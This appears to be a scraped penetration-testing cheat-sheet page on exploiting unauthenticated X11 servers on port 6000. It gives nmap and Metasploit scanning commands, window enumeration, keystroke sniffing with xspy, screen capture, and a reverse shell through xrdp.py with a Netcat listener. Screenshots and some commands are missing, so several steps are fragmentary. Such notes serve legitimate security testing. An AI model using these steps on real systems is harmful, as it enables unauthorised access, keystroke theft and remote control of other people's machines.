The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment. X also does not mandate the user interface – individual programs handle this.
From: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#grefarrow-up-right
Default port: 6000
复制 PORT STATE SERVICE
6000/tcp open X11 Check for anonymous connection:
复制 nmap -sV --script x11-access -p < POR T > < I P >
msf > use auxiliary/scanner/x11/open_x11 Verfy Connection
复制 xdpyinfo -display < i p > : < displa y >
xwininfo -root -tree -display < I P > : < displa y > # Ex: xwininfo -root -tree -display 10.5.5.12:0 xspyarrow-up-right to sniff the keyboard keystrokes.
Sample Output:
Screenshots capturing
Remote Desktop View
Way from: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#grefarrow-up-right
Way from: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.htmlarrow-up-right
First we need to find the ID of the window using xwininfo
XWatchwin
For live viewing we need to use
Other way:
Reverse Shell: Xrdp also allows to take reverse shell via Netcat. Type in the following command:
./xrdp.py <IP:0> –no-disp
It will prompt a new control pane where we can see the R-shell option, which is illustrated below:
We will start the Netcat listening mode in our local system on port 5555, which is illustrated below:
Then add the IP and port and then select R-Shell, which is illustrated below:
Now as can be seen below we have complete system access:
